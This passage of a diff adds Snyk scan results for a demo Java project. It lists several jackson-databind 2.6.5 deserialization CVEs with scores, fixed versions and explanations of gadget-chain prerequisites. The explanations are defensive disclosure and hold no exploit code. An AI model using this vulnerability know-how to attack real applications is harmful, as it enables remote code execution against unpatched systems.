"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": 
[], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2052", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 
8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.496040Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", + "epssDetails": { + "percentile": "0.81303", + "probability": "0.00770", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12022" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cjjf-94ff-43w7", + "GHSA-wrr7-33fx-rcvj" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:11:34.234921Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:00:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:00:03Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:36.643590Z", + "socialTrendAlert": false, + 
"packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2032", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + 
"modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:53.818908Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", + "epssDetails": { + "percentile": "0.85803", + "probability": "0.01278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11307" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qr7j-h6gg-jmgc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:14:00.916831Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-10T17:10:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2018-10-11T17:10:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:26.624837Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2058", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:47:31.058577Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.092429Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", + "epssDetails": { + "percentile": "0.82708", + "probability": "0.00890", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12023" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6wqp-v4v6-c87c" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:16:09.944095Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:15:50Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2018-10-11T17:15:49Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:43.326081Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + 
"assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.637612Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.92634", + "probability": "0.04626", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14718" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-645p-88qh-w398" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:07.540945Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:19:49Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
